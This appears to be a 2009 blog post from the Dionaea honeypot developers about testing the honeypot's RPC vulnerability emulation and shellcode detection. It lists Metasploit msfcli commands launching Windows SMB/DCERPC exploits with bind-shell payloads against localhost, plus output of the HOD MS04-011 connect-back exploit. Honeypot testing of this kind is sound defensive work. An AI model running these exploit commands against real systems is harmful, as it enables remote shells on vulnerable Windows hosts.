Iteolih: RPC vulnerability implementation party

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

So I just launched some metasploit modules against the honeypot…

#!/bin/sh ./msfcli exploit/windows/smb/ms06_040_netapi PAYLOAD=windows/shell/bind_tcp RHOST=127.0.0.1 T=0 E ./msfcli exploit/windows/smb/ms06_066_nwapi PAYLOAD=windows/shell/bind_tcp RHOST=127.0.0.1 T=0 E ./msfcli exploit/windows/smb/ms06_066_nwwks PAYLOAD=windows/shell/bind_tcp RHOST=127.0.0.1 T=0 E ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=127.0.0.1 T=0 E ./msfcli exploit/windows/dcerpc/ms05_017_msmq PAYLOAD=generic/shell_bind_tcp HNAME=dionaea RPORT=135 RHOST=127.0.0.1 T=0 E ./msfcli exploit/windows/dcerpc/ms07_065_msmq PAYLOAD=generic/shell_bind_tcp DNAME=www.google.de RPORT=135 RHOST=127.0.0.1 T=0 E ./msfcli exploit/windows/smb/ms05_039_pnp PAYLOAD=generic/shell_bind_tcp RHOST=127.0.0.1 T=0 E ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=generic/shell_bind_tcp RHOST=127.0.0.1 T=0 E

… and watched dionaea spit out the info (cut for better blog experience):

[25082009 18:06:00] emu : shellcode found offset 135 [25082009 18:06:00] RPCVULN : got the DCERPC request for NetPathCanonicalize. MS08-067 exploit? [25082009 18:06:18] RPCVULN : got the DCERPC request for NwOpenEnumNdsSubTrees. MS06-066 exploit? [25082009 18:06:25] RPCVULN : got the DCERPC request for NwChangePassword. MS06-066 exploit? [25082009 18:06:45] RPCVULN : got the DCERPC request for RemoteActivation. MS03-026 exploit? [25082009 18:06:45] emu : shellcode found offset 988 [25082009 18:07:01] RPCVULN : got the DCERPC request for QMDeleteObject. MS05-017 exploit? [25082009 18:07:01] emu : shellcode found offset 776 [25082009 18:07:01] emukind : bindshell host 0.0.0.0 port 4444 [25082009 18:07:08] RPCVULN : got the DCERPC request for QMCreateObjectInternal. MS07-065 exploit? [25082009 18:07:18] RPCVULN : got the DCERPC request for PNP_QueryResConfList. MS05-039 exploit? [25082009 18:07:38] RPCVULN : got the DCERPC request for RemoteActivation. MS03-026 exploit? [25082009 18:07:38] emu : shellcode found offset 1080 [25082009 18:07:38] emukind : bindshell host 0.0.0.0 port 4444

Also the infamous HOD exploit triggers libemu nicely:

`$ ./hod 0 127.0.0.1 445 127.0.0.1

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
— Coded by .::[ houseofdabus ]::. — doing connectback
[] Target: IP: 127.0.0.1: OS: WinXP Professional [universal] lsass.exe
[] Connecting to 127.0.0.1:445 … OK
[*] Attacking … OK`

[25082009 18:08:09] emu : shellcode found offset 302 [25082009 18:08:09] RPCVULN : got the DCERPC request for DsRolerUpgradeDownlevelServer. MS04-011 exploit? [25082009 18:08:09] emukind : connectbackshell host 127.0.0.1 port 445

With some exploits libemu does not give a correct shellcode profile or does not detect a shellcode - this will mostly be the case because of unicode encoding or some other custom encapsulation in the rpc packets. We will add some heuristics later which can preprocess the data to improve libemu’s detection.

The honeypot also already supports shell emulation and ftp/http/tftp downloads of malware - but this was turned off for the above tests.

Feel free to checkout the honeypot’s code and try it for yourself. We need testing and feedback! As documentation is rather small, feel free to ask questions in the nepenthes IRC channel.

Mark